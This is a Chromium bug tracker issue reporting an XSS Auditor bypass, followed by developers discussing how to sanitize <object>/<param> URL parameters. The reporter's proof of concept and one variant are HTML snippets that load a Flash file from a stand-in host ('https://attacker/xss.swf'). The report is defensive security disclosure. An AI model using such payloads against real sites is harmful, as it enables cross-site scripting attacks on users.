New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.
Starred by 2 users

Issue metadata

Status: Duplicate
Merged: issue 783618
Closed: Nov 2017
EstimatedDays: ----
NextAction: ----
OS: Linux , Android , Windows , Chrome , Mac
Pri: 3
Type: Bug

Show other hotlists

Hotlists containing this issue:

Sign in to add a comment

Issue 676992: XSS Auditor bypass using object tag and url parameter

Reported by, Dec 26 2016

Issue description

I'd like to report an XSS Auditor bypass bug.
PoC is here:

<object allowscriptaccess="always">
<param name="url" value="https://attacker/xss.swf">

Could you confirm this bug?

Version 57.0.2962.0 (Official Build) canary (64 bit)

Comment 1 by, Dec 26 2016

It seems it works via the name="code" also.

<object allowscriptaccess="always">
<param name="code" value="https://attacker/xss.swf">

Comment 2 by, Dec 27 2016

Components: Blink>SecurityFeature
Labels: -Type-Bug-Security -Restrict-View-SecurityTeam Type-Bug
Status: Assigned (was: Unconfirmed)
Thanks for the report. Tom, could you take a look when you get a chance?

Comment 3 by, Jan 3 2017

Status: Started (was: Assigned)
Looks like there are few more <param> cases to cover.  Thanks for the report.

Comment 4 by, Jan 3 2017

I'm also going to filter the allowscriptaccess attribute in <object>, just because, even though there's enough malice that can be accomplished even without it.

Comment 5 by, Jan 3 2017 is where we decide which name=xxx parameters are candiates for sanitization.

Comment 6 by, Jan 3 2017 has its own ideas about URL parameters. 

Mike, should we unify the two?  Have a suggestion about who else might weigh in on param element behaviour?

Comment 7 by, Jan 3 2017

Mike: |allowscriptaccessAttr| token doesn't exist, can we add this to whatever IDL generates these?

Comment 8 by, Jan 3 2017

Bouncing to mike to get some answers.  Pls re-assign to me afterwards.

Comment 9 by, Feb 23 2017

Labels: xssauditor

Comment 10 by, Feb 24 2017

Labels: OS-Android OS-Chrome OS-Linux OS-Mac OS-Windows Pri-3
I missed this, apologies:

1.  I don't think we handle `allowscriptaccess` in Blink today; we just hand all the params over to the plugin and let it figure out what it ought to be doing with them. Feel free to add it to `Source/core/html/HTMLAttributeNames.json5`.

2.  I think unifying the URL parameter behavior makes sense. Do you have a concrete suggestion for doing so?

Comment 11 by, Nov 10 2017

Labels: Hotlist-EnamelAndFriendsFixIt

Comment 12 by, Nov 10 2017

Mergedinto: 783618
Status: Duplicate (was: Started)
Oddly enough, this came in again recently.  Doing the uncool thing of duping the old into the new, because that's where the work is happening.

Sign in to add a comment